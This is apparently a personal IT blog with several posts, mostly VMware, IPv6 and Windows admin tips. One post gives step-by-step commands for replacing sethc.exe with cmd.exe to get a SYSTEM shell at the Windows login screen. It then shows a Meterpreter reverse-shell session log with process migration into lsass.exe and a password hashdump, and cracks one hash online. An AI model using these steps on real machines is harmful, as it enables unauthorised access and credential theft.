P2V the VMware way

26 01 2012

VMware converter standalone is a free download:

http://www.vmware.com/products/converter/

Got Yas:
Insufficient permissions to connect to xxxxxxx ADMIN$ for Windows XP machine you are trying to convert

run gpedit.msc

– Computer Configuration

 – Windows Settings

  – Security Settings

   – Local Policies

    – Security Option

     – Network access: Sharing and security model for local accounts

 

By default XP has the Sharing and security model for local accounts set to “Guest only – local users authenticate as Guest” – this needs to be changed to “Classic – local users authenticate as themselves”

This way you can access the machine remotely with the admin account & do the conversion.





Disable Windows 7 IPv6 random temporary addresses

4 08 2011

One of the added security features with IPv6 addressing is “Temporary address interface identifiers”

https://isc.sans.edu/diary.html?storyid=10966

Many operating systems use the EUI-64 algorithm to generate IPv6 addresses. This algorithm derives the last 64 bits of the IPv6 address using the MAC address. Many see this as a privacy problem. The last half of your IP address will never change, and with MAC addresses being somewhat unique, the interface ID becomes close to a unique “cookie” identifying your system.

As a result, RFC3041 introduces “privacy enhanced” addresses which will change and are created by hashing the MAC address.

*NOTE: Default behaviour of Windows XP & Server 2003 does not use the randomization*

What this means from an administration perspective is that after every reboot, the IPv6 address that is presented to the network changes ….. which makes things like DNS / FW rules etc a nightmare to manage in a corporate / enterprise scenario where you really need to be able to have a stable addressing scheme.

I have a /52 IPv6 subnet through a tunnel broker. My border firewall terminates the tunnel & advertises the subnet on the inside interface for autoconfiguration (without having to configure DHCP)

So, lets break it down.

I get a /52 subnet, which is advertised to my internal machines.

aaaa:bbbb:cccc:dddd::/56

In normal configuration, by default in Windows 7 – it generates a randomized Link-local address (not based on the MAC)

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
Link-local IPv6 Address . . . . . : fe80::d95:67db:fba2:7dad%11(Preferred)

Using stateless autoconfiguration I get an IPv6 address from my FW, based on the Link-local address

IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:d95:67db:fba2:7dad(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

However, Windows isnt done yet, it also assigns a Temporary IPv6 address – which is used when accessing network resources. This Temporary address is only kept for a set period, and changes when the machine reboots – and here is the problem. How can I configure a firewall rule for this host to reach an external resource ?

Here is the result of several reboots:

Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a5cb:b012:16f0:6fa9
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:ec65:b6ca:abd6:1349
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:752b:87c:f84:a4d6
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:1031:46fd:cfd7:d88c
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:5883:7ef2:9c64:6eab
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a400:251a:59:1cd6:bf0f

You can disable this & just use the interface based EUI-64 address by running the following commands.

Bring up a command prompt in administrator mode (Start -> All Programs -> Accessories -> Right click on Command Prompt, run as Administrator)

Then run these commands (should get OK response)

netsh interface ipv6 set privacy state=disabled store=active
netsh interface ipv6 set privacy state=disabled store=persistent
netsh interface ipv6 set global randomizeidentifiers=disabled store=active
netsh interface ipv6 set global randomizeidentifiers=disabled store=persistent

Restart your machine

Your machine should now get a stable IPv6 address based on the MAC address. You can now use this MAC address for DNS entries, FW rules etc & it’s access will remain consistent across reboots.

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:20c:29ff:fe88:9f2a(Preferred)
Link-local IPv6 Address . . . . . : fe80::20c:29ff:fe88:9f2a%10(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

A note on the addressing – In this addressing mode, the 64-bit interface identifier is derived from its 48-bit MAC address. A MAC address 00:1D:BA:06:37:64 is turned into a 64-bit EUI-64 by inserting FF:FE in the middle: 00:1D:BA:FF:FE:06:37:64. As I “only” have a /52 assigned to me the whole MAC is not used, but the address is based on the last 5 octets.





bigger, better, faster, more VMware

19 07 2011

No, before we even start, this is not a blog post about the 4 Non Blondes album.

This is a documentation of my mind numbing, soul destroying search for the best performing configuration with the hardware I have in my lab.

I have spent countless hours / days / weeks building, breaking & rebuilding my VM Lab (thankfully I have an understanding wife & daughter).

Hardware primarily consists of:

2x HP Proliant N36L Microservers (Athlon II Neo Dual Core 1.3) (8GB RAM in one box / 2GB in the other).
2x HP DC7100 Desktops (P4 2.8 / 2GB RAM)
1x Dell Precision 370 (P4 3.0 / 4GB RAM)
Cisco 2950 (24×10/100 + 2×1000)

Add to this an assortment of older F5’s / dual P3 pizza boxes & other no name kit – and I have a playground full of toys.

I have been using unRAID for the past few years on various hardware platforms. This has been mainly for storing media, ISO’s & providing a backup target for the various laptops & workstations around the house.

Recently I picked up the two HP N36L Microservers, the 8GB one is my primary VMware ESXi 4.1 host and the 2GB server is running unRAID. Just having the second box sitting there running unRAID seems a little under-utilised to me, the disks are in standby most of the time (thanks to netflix) – and it just hasnt been getting the workout I think it deserves.

So – enter the newest project – whats the best solution for storing media / ISO’s / Backups / VMs etc – I want to be able to use either iSCSI or NFS to play with vMotion of VMs when I finish building my VMware test lab to finish my VCP – I want it fast, but I want it protected in case a disk fails.

I have tested & played with the following in my quest:

Storage Systems:
FreeNAS 7 & 8 (Physical & Virtual)
Openfiler (Physical & Virtual)
Nexenta (Physical & Virtual)
unRAID Physical (Virtual not supported due to USB GUID licensing)

Presentation to Client Machines:
Local storage in the ESXi host presented to Windows 7 VM
iSCSI Raw Device Mappings presented to Windows 7 VM
iSCSI Presented to ESXi -> VMFS-3 filesystem -> VMDK presented to Windows 7 VM
iSCSI Presented to Physical Windows 7 Client
NFS Presented to ESXi -> VMDK presented to Windows 7 VM
CIFS/SMB Presented to Physical Windows 7 Client

I have been using a single test scenario on each config – using Iometer – with the file & results formatted from http://vmktree.org/iometer/

First I want to benchtest them for performance, then to setup the best solution that is a mix of performance & redundancy.

Sounds impossible – im gonna try.

For the performance benchtesting – I decided to go with a 2 spindle ZFS striped config, tested from Windows 7 Clients
Physical Client: HP DC7100
Physical FreeNAS: HP N36L(2GBRAM / 1TB WD Green / 2TB WD Green )

I have mismatched sizes as thats the hardware I have free at the moment. If I find a compelling reason why this wont work, then I may get a second 2TB disk to match. I am using WD Green disks for their low power / cooler running – comodity hardware.

Scenario 1 – Physical FreeNAS 7 with iSCSI
Physical Client -> iSCSI on Physical NAS
Virtual Client -> VMDK on ESXi -> iSCSI Physical NAS

Scenario 2 – Physical FreeNAS 7 with NFS & CIFS/SMB
Physical Client -> CIFS/SMB on Physical NAS (Usual windows sharing type scenario)
Virtual Client -> VMDK on ESXi -> NFS Physical NAS

Scenario 3 – Virtualised FreeNAS 7 with iSCSI
* Physical Disks formatted with VMFS-3, with VMDK presented to FreeNAS VM
Physical Client -> iSCSI on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 4 – Virtualised FreeNAS 7 with NFS & CIFS/SMB
* Physical Disks formatted with VMFS-3, with VMDK presented to FreeNAS VM
Physical Client -> CIFS/SMB on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 5 – Virtualised FreeNAS 7 with iSCSI
* Physical Disks presented via Physical RDM passthrough to FreeNAS VM
* RDM Config thanks to http://www.vm-help.com/esx40i/SATA_RDMs.php
* RDM passthrough used to enable SMART monitoring from the FreeNAS VM – very cool
Physical Client -> iSCSI on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 6 – Virtualised FreeNAS 7 with NFS & CIFS/SMB
* Physical Disks presented via Physical RDM passthrough to FreeNAS VM
* RDM Config thanks to http://www.vm-help.com/esx40i/SATA_RDMs.php
* RDM passthrough used to enable SMART monitoring from the FreeNAS VM – very cool
Physical Client -> CIFS/SMB on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

I will be adding follow up posts with the performance results, the PRO’s & CON’s (in my view) with each of these scenarios. Feel free to add comments & kick off discussions about this project.





vsphere client on Windows 7

9 03 2011

So as it always seems to happen, the few apps you really want to work …. dont.

I loaded up the vSphere client under Windows 7 & it failed to connect to my ESXi host, nor would it connect to my Virtual Centre server.

It just fell in a heap with the following errors ……

“Error parsing the server “server name” clients.xml” file.”

and

“The type initializer for ‘VirtualInfrastructure.Utils.HttpWebRequestProxy’ threw an exception.”

After much Google trawling later, I came across the solution.

  • Create lib folder under the Launcher folder

C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\lib

  • Copy system.dll into the lib folder, or if you prefer to grab your own dll from the %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ directory of a Windows XP machine with .NET v3.5 SP1 installed.

C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher

The only change in the config file is the addition of the following lines:

<runtime>
<developmentMode developerInstallation=”true”/>
</runtime>

before the last </configuration> close tag.

  • Create a new system variable

DEVPATH=C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\lib

  • Change the VpxClient.exe app to run as an administrator:

If all things went well – you should now just be able to launch the vSphere client & admin your machines as you did before.





60seconds of physical access = p0wn3d windows machine

27 09 2010

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Stickey keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, backup the original file and copy in cmd.exe

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 time and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] 172.16.189.137:1029 Request received for /Arf3V...
[*] 172.16.189.137:1029 Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] 172.16.189.137:1030 Request received for /Brf3V...
[*] 172.16.189.137:1030 Stage connection for target rf3V received...
[*] Meterpreter session 2 opened (172.16.189.138:443 -> 172.16.189.137:1030) at 2010-09-27 21:35:10
+1000
[*] Session ID 2 (172.16.189.138:443 -> 172.16.189.137:1030) processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  : 172.16.189.137
Netmask     : 255.255.255.0

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.





The Windows 7 Guide: From Newbies To Pros [FREE EBOOK]

7 09 2010

Not overly exciting, but packed with good information for beginning the assault on Windows7. I have been a long time windows user, my main machine is a macbook, and I have several linux boxes kicking around also. This free PDF explains a lot of the Windows7 features, and im going to shoot it off to my Parents (who are using Vista) to give them a quick overview. For the less technical in our families, this may just be the book of basic answers they need.

The Windows 7 Guide: From Newbies To Pros [FREE EBOOK].





Dissecting the Pass the Hash Attack

28 07 2010

Nice to see an article including Backtrack on the windowsecurity.com list. Its a nice writeup on using backtrack to pass the hash to use psexec to remotely launch a reverse shell. If you havent read much about using password hashes, this would be a good read. It also links to other articles about gaining access to hashed passwords, from physical box access to various tools.

In this article we will look at how this technique works and I will demonstrate the process that can be used to take stolen password hashes and use them successfully without having to crack their hidden contents. As always, I will cover some detection and defensive techniques on how you can prevent yourself from falling victim to this attack.

via Dissecting the Pass the Hash Attack.